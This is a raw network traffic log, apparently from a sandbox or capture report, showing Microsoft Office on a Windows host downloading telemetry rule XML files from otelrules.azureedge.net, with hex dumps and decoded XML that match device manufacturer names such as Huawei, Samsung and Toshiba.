                                                                                                                                                                                                                                                                            ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                                            x-ms-request-id: 7732d518-401e-0035-4c64-4482d8000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175947Z-174f7845968kdththC1EWRzvxn0000000kh000000000t340
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:47 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            65192.168.2.44996213.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:47 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:48 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 499
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                                            x-ms-request-id: 98fcde7c-201e-0096-4eef-44ace6000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175948Z-174f7845968swgbqhC1EWRmnb400000016b000000000rrxw
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:48 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            66192.168.2.44996313.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:47 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:48 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                                            x-ms-request-id: f440c5dc-801e-0047-7891-3f7265000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175948Z-174f7845968xr5c2hC1EWRd0hn0000000r4g00000000b7yx
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:48 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            67192.168.2.44996413.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:48 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:48 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                                                            x-ms-request-id: e7678828-401e-0078-7a85-434d34000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175948Z-174f7845968psccphC1EWRuz9s00000016g000000000fvr0
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:48 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            68192.168.2.44996813.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:48 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:48 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                                            x-ms-request-id: 2132beec-901e-00ac-46aa-42b69e000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175948Z-174f78459685726chC1EWRsnbg00000016d0000000004pcb
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:49 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            69192.168.2.44997513.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:49 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:49 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 494
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                                            x-ms-request-id: 1e31e9ea-701e-0098-028a-43395f000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175949Z-174f7845968j6t2phC1EWRcfe800000016h0000000001kcr
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:49 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            70192.168.2.44997913.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:50 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:50 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                                            x-ms-request-id: c0407c6d-d01e-0082-369d-43e489000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175950Z-174f784596886s2bhC1EWR743w00000016cg0000000048n1
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:51 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            71192.168.2.44997813.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:50 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:50 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 420
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                                            x-ms-request-id: 06c834e2-b01e-0001-1c8a-4346e2000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175950Z-174f7845968glpgnhC1EWR7uec00000016eg00000000c7h0
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:51 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            72192.168.2.44998013.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:50 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:50 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                                            x-ms-request-id: b5d3fb3c-c01e-000b-6fb4-42e255000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175950Z-174f7845968ljs8phC1EWRe6en000000162000000000pbxx
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:51 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            73192.168.2.44998313.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:51 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:51 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                                            x-ms-request-id: 716ae074-c01e-0046-576f-432db9000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
